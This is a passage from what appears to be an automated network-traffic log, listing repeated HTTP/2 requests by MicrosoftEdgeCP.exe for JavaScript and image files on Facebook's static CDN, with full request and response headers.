          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yA/r/QZ1D800hehn.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sun, 23 Mar 2025 15:51:23 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: Gpj3OSAAsnBzD34KN+Kqew==
          x-fb-debug: FhJId69EV3TMViSUIP7L+X59kIa38C5tV6E1FvOyJbLqeTbHKbKCAnV/dVFPAwOoHcw62JUxeHfTh0+qm8ZSpg==
          content-length: 4516
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=269443, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yM/l/en_GB/FEkqNIaswP2.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3iLl54/yM/l/en_GB/FEkqNIaswP2.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sun, 23 Mar 2025 15:51:23 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: CCi7QC/LC+te48qu0RFbJg==
          x-fb-debug: 8xtiT8cWNr3dge24zxqGsGmIThG1hkZf+BVPL0x1g5lYR+jU08lentWhZ4D5Z/wKc8ASVxGh7Z4cJ514E6T0gw==
          content-length: 1080
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=270870, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/NkNLuLg--0P.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/ye/r/NkNLuLg--0P.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sun, 23 Mar 2025 15:57:45 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: Amdw+Xx6JKnFQa7yNgJPfQ==
          x-fb-debug: 5+dwie72MtDXCNh1O9EgKTMQH2dnN+eD945AdZqRhHjdfNLqtk2lEZtdP9/waZeG63adfFfRBZF6VdCVRUyVEg==
          content-length: 2198
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=280482, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3iLQG4/yE/l/en_GB/L9EEz6rNX7J.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3iLQG4/yE/l/en_GB/L9EEz6rNX7J.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 18:51:52 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: QV5tP4xrQfKQgfzc+N8CXg==
          x-fb-debug: WzCWeOpHxxuMwcPSJ+we1e06pcHqw25E4v5dG23DJ4peV/+8wdRZRg1fEAbN53ch3uIYcrdEiy6Yz8C9PJM7cQ==
          content-length: 4054
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=283072, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/5rq9I4Z3cHG.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yc/r/5rq9I4Z3cHG.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 00:45:07 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: AWDdabYRLbfjvyPRrazv1w==
          x-fb-debug: WqYFgzeOg/bK42emZ08tLEQvIsoPHuBk6tFunTxHCDS4zo5IkN392L28Hsmho74XZpAggve23jI5WA5ggrqOsA==
          content-length: 4629
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=283072, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Zi2a522yEur.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yB/r/Zi2a522yEur.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Wed, 02 Apr 2025 04:01:12 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: 69+5ZPvo+GGmzoQett2rAQ==
          x-fb-debug: 85dWWyz+ccPSYB8I/xC7zzbRBTPEpMOHMOIwg2LmxXPUL2iE52jRZXGX8j6u7azvoS+hT4kTlf8M+TYzHvNqAw==
          content-length: 2312
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=283072, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/Y-NeO89oGbz.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yO/r/Y-NeO89oGbz.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 16:51:57 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: vrgYGdAl+0COAGNd1r2wrA==
          x-fb-debug: 5jLCFEgsgHOfRSGu4c94oP+E6PtLYBPt495lmO5BldfNbUH10yjNh2x1ETYy4U6mIMeLqPSfMOAVOYGivVxliA==
          content-length: 11044
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=296389, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/ie38mp0O07P.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/y9/r/ie38mp0O07P.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 02:25:18 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: CEYVgZg04j7erS0ub7sNsg==
          x-fb-debug: 0v8x55GiMT9BC1o4g+RdPrchArl0YKe4gdxh2YqeythN5QhqwxGlQUJU+32TIfYWAtkpVgNgBcjd4v2U7sqfdQ==
          content-length: 10390
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=296389, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/y_/r/R5gdhlZVV8d.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/y_/r/R5gdhlZVV8d.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 16:49:08 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: 1RqNOTwx0UGp9pwqfwyhUA==
          x-fb-debug: +LvnljFeYVv9HqEpuNTXUB9B8eUjgL9Z2Or9L4TvCSKXIX7O6reQPH2hW9Xhm5GAsvdjaDKMJ2pJWyWqA3/ODA==
          content-length: 2456
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=183, mss=1357, tbw=319077, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3iRWc4/yi/l/en_GB/XIgqZiNGLYp.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3iRWc4/yi/l/en_GB/XIgqZiNGLYp.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          content-md5: 5EQsoi/uhrxcx/3+KAk3iQ==
          expires: Sat, 29 Mar 2025 03:41:14 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          x-ua-compatible: IE=edge
          x-fb-debug: oZxGIkHZEXDme0diCVDkAOFR5vXMjrRyf5PDMiUwEv64FrxAXF8e5ZWFs34n6A5Xs8INQmKbWv2EcAwwBhKIjg==
          content-length: 13599
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=184, mss=1357, tbw=321887, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/wwPr_f3niE-.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yj/r/wwPr_f3niE-.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 00:42:35 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: smiqUG9rMheQxmOK9rtk6A==
          x-fb-debug: IHVKKGVZLkeW6aem+8NPYVjI+j0f15HKLdv0OJNdzTlqlEz3tIEPosVu1y0P0XQklmOhWuZIPAmvOlbUjBE2WA==
          content-length: 9397
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=2, c=184, mss=1357, tbw=330282, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sun, 30 Mar 2025 01:04:18 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: W5jgcEXKioVMwlHFWJyajA==
